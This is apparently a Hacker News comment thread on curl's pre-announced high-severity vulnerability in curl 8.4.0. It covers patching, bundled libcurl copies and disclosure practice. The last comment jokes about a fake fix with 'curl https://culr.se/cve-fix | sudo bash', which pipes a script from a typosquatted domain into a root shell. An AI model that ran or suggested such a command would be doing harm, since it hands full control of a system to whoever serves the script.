Severity HIGH security problem to be announced with curl 8.4.0 on Oct 11

  • Ouch! The percentage of internet of things devices that don't ship libcurl is a rounding error. The percentage of internet of things devices that patch libcurl is also a rounding error.

  • > Updating the shared libcurl library should be enough to fix this issue on all operating systems.

    > Then again there will also be countless docker (and similar) images that feature their own copies, so there will still be quite a large number of rebuilds necessary I bet.

    Quite a large number, yeah.

  • I kinda hate doing things this way...

    Could it be better not to just come out with a somewhat alarmist take that, hey, we are going to release a high-risk vulnerability in a week... and fixes for that...

    But instead just release the new version and the CVE at the same time? Now is everyone trying to get ready to exploit this on the 11th, or already getting the most out of it if they know? And does this information really make anyone hover their finger on the button to push new versions and so on on the 11th?

  • Sad to see this just a month and a half from this post: https://daniel.haxx.se/blog/2023/08/26/cve-2020-19909-is-eve...

    Is the CVE system unreasonably alarmist, or is C unpredictable with flaws?

  • C software really needs to be used in a sandbox because this stuff is inevitable.

  • Relevant XKCD: https://xkcd.com/2347/

    (Just switch Nebraska with Stockholm)

    Also consider throwing a buck or two curl's way: https://curl.se/donation.html

  • Place your bets: a) logic bug b) memory bug (buffer overrun/use after free/etc) c) other

  • The race has begun. Although I'd be surprised if it was an easy one to figure out, given curl's status.

  • Ah, the fix is out!

      curl https://culr.se/cve-fix | sudo bash
    
    aw crap ...